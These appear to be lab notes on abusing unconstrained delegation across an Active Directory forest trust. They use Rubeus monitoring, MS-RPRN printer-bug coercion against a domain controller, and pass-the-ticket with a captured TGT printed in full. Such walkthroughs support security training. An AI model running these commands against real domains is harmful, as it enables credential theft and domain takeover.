Cross Forest (Unconstrained Delegation)

We will learn how to abuse unconstrained delegation across forest

First checking if TGTDelegation is enabled

Open Rubeus.exe in monitoring mode

.\\Rubeus.exe monitor /target:usvendor-dc$ /interval:5 /nowrap

Untitled

Now let’s Abuse the printerbug

MS-RPRN.exe \\\\usvendor-dc.usvendor.local \\\\us-web.us.techcorp.local

Untitled

Now let’s go and check Rubeus.exe

Untitled

we got the usvendor-dc ticket

Let’s use Rubeus.exe to perform Pass-The-Ticket

.\\Rubeus.exe ptt /ticket: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

Untitled

Now let’s list the tickets to validate

klist

Untitled